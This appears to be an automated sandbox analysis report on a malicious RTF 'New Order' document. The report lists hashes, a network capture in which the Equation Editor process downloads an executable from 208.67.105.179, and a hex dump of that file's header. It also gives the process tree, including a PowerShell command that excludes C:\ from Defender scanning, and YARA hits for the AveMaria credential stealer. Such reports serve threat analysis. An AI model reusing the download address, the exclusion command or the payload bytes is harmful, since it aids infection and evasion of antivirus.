                    SHA-512:5241619762E71A38FA8CFA6BED33AE00325F61FD181F9FB7EE261E2FD2341415CD27E549656E34F027489A06473F99BFF30384BE5DF5EE1E3C73AF60291F77E8
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
Dropped file: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe (path taken from the antivirus table; byte-identical to the IE cache copy above, all hashes match)
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2358784
                    Entropy (8bit):2.646635659437136
                    Encrypted:false
                    SSDEEP:6144:5633nN00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+8Jk7UBj7A0:5633+D4pa7+o
                    MD5:5AE8471C10CDB2A59B950E66F8CA8A46
                    SHA1:284F5B01A3D7F404DCD9B5346D1A67A9DE0E9C6B
                    SHA-256:2A83A969BE112352798176D1769378C9D3330799051DF12114B1BB8D7EF0BFB5
                    SHA-512:C872B2B93BC0CE74B89DC1F8A54FA4E5356A668FD3C406EE62EB63FEEEF93E03AD59D5B23B841287A2BB0ADEF54699049F3CC7C9CDD7EA2A91253DACBA4E0344
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[V.n5..n5..n5.^04..n5.^06..n5.^01..n5.^00..n5......n5......n5..n4.}n5.F00..n5.F05..n5.F0...n5..n...n5.F07..n5.Rich.n5.................PE..L...*..b.....................n#.....:.............@..........................P$...........@.....................................,.....!.....................@$..... ...............................@...@...............T............................text............................... ..`.rdata...4.......6..................@..@.data..... ....... .................@....gfids..`.....!......b!.............@..@.tls..........!......d!.............@....rsrc........!......f!.............@..@.reloc.......@$.......#.............@..B................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                    File type:data
                    Entropy (8bit):5.4482786978546205
                    TrID:
                    • Rich Text Format (4004/1) 100.00%
                    File name:New Order ( MY 01-22-DTHI .doc
                    File size:11198
                    MD5:ae55aaa571fd4f87839cb1ebc9706d32
                    SHA1:f7dab7f7f3556fe38a001dba46c9e93d4ffbf32b
                    SHA256:49235a707a23701651de637ce90e530247dcf6877001f416aa459a9bb0a22daa
                    SHA512:1fa3ae6b24226e12919be1b36f92843276801157f2968e891125d3d7ee6aec7ae69e6086adf187fd75ba3cca697c80ad891c6ff697f10107db3dcca10ef8e5e6
                    SSDEEP:192:a6VFXWgf93ef3FZr2aZmnJfiMll+bZXe9uZwVtDvwFiNS+NS6CLcFS6s:a6VFXWgf93et0dJfVll+bZXe9uUFwEAd
                    TLSH:2132077CC04B4AD8CFC962F89A0A7E5550687A6CE3C9B4237A7CB3752796D3E6207434
                    File Content Preview:{\rt?click enable editing to open in readable format'??7!?;|`$]??'.9#344~#[|.|'?~,<3++:.&'^?9?1.?,0*!~<+[72<!(98,?1.'47;;%'$$;+9`?;%~|<:.@@<.-5+^.<4.`?|?|8,??9~#+2+$.+)7?.`5>?1?(?6:^2?'%_7-./_@0`3?2;33-8/^~2.7,?4%][_2-+_.0?!^04,%%?&99?]^-*.<?.*??%];!_?=09
                    Icon Hash:e4eea2aaa4b4b4a4
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Aug 6, 2022 08:57:45.428165913 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.456696033 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.456790924 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.457700968 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.486179113 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486479998 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486517906 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486566067 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486603022 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486620903 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486633062 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486649036 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486650944 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.486669064 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486670017 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.486706972 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486723900 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.486787081 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.486798048 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.486800909 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.498687983 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.515767097 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.515810013 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.515840054 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.515842915 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.515868902 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.515875101 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.515904903 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.515908003 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.515930891 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.515980005 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516103983 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516175032 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516190052 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516215086 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516252995 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516263008 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516340971 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516379118 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516405106 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516421080 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516453028 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516489029 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516510010 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516557932 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516582012 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516623974 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516700029 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516705036 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516742945 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516784906 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516853094 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516891003 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516912937 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516918898 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516920090 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.516932011 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.516984940 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.517014980 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.517021894 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.517107010 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.517189980 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.543795109 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.543834925 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.543859005 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.543883085 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.543910027 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.543910980 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.543935061 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.543936968 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.543939114 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.543947935 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.543978930 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544006109 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544033051 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544050932 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544055939 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544058084 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544059038 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544087887 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544091940 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544114113 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544122934 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544142008 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544156075 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544158936 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544168949 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544184923 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544195890 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544223070 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544231892 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544234991 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544249058 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544256926 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544275999 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544282913 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544303894 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544331074 CEST | 80 | 49178 | 208.67.105.179 | 192.168.2.22
                    Aug 6, 2022 08:57:45.544342041 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    Aug 6, 2022 08:57:45.544347048 CEST | 49178 | 80 | 192.168.2.22 | 208.67.105.179
                    • 208.67.105.179
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    0 | 192.168.2.22 | 49178 | 208.67.105.179 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Timestamp | kBytes transferred | Direction | Data
                    Aug 6, 2022 08:57:45.457700968 CEST | 0 | OUT | GET /fifthikmerozx.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 208.67.105.179
                    Connection: Keep-Alive
                    Aug 6, 2022 08:57:45.486479998 CEST | 1 | IN | HTTP/1.1 200 OK
                    Date: Sat, 06 Aug 2022 06:57:45 GMT
                    Server: Apache
                    Last-Modified: Thu, 04 Aug 2022 23:59:00 GMT
                    ETag: "23fe00-5e573221f770a"
                    Accept-Ranges: bytes
                    Content-Length: 2358784
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 0f 5b 56 f3 6e 35 05 f3 6e 35 05 f3 6e 35 05 5e 30 34 04 f1 6e 35 05 5e 30 36 04 f7 6e 35 05 5e 30 31 04 fe 6e 35 05 5e 30 30 04 d5 6e 35 05 fa 16 b6 05 f0 6e 35 05 fa 16 a6 05 e8 6e 35 05 f3 6e 34 05 7d 6e 35 05 46 30 30 04 f0 6e 35 05 46 30 35 04 f2 6e 35 05 46 30 ca 05 f2 6e 35 05 f3 6e a2 05 f2 6e 35 05 46 30 37 04 f2 6e 35 05 52 69 63 68 f3 6e 35 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a 18 ec 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 8c 00 00 00 6e 23 00 00 00 00 00 3a 8d 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 c6 00 00 a8 00 00 00 88 c7 00 00 2c 01 00 00 00 b0 21 00 d0 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 24 00 00 0d 00 00 20 ad 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ad 00 00 18 00 00 00 40 ad 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 8a 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 34 00 00 00 a0 00 00 00 36 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a0 20 00 00 e0 00 00 00 9c 20 00 00 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 60 00 00 00 00 90 21 00 00 02 00 00 00 62 21 00 
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 a0 21 00 00 02 00 00 00 64 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 88 02 00 00 b0 21 00 00 8a 02 00 00 66 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 0d 00 00 00 40 24 00 00 0e 00 00 00 f0 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1b 15 00 00 c6 05 f5 7b 61 00 01 c3 cc cc cc 6a 00 68 7c 6f 61 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[Vn5n5n5^04n5^06n5^01n5^00n5n5n5n4}n5F00n5F05n5F0n5nn5F07n5Richn5PEL*bn#:@P$@,!@$ @@T.text `.rdata46@@.data @.gfids`!b!@@.tls!d!@.rsrc!f!@@.reloc@$#@B{ajh|oa



                    Target ID:0
                    Start time:08:58:13
                    Start date:06/08/2022
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f090000
                    File size:1423704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:2
                    Start time:08:58:14
                    Start date:06/08/2022
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:5
                    Start time:08:58:19
                    Start date:06/08/2022
                    Path:C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
                    Imagebase:0xdd0000
                    File size:2358784 bytes
                    MD5 hash:5AE8471C10CDB2A59B950E66F8CA8A46
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 58%, ReversingLabs
                    Reputation:low

                    Target ID:6
                    Start time:08:58:54
                    Start date:06/08/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                    Imagebase:0x21e10000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    Target ID:8
                    Start time:08:58:55
                    Start date:06/08/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\cmd.exe
                    Imagebase:0x4ab90000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:10
                    Start time:08:59:07
                    Start date:06/08/2022
                    Path:C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\fiftikmernk852317.exe"
                    Imagebase:0xdd0000
                    File size:2358784 bytes
                    MD5 hash:5AE8471C10CDB2A59B950E66F8CA8A46
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    No disassembly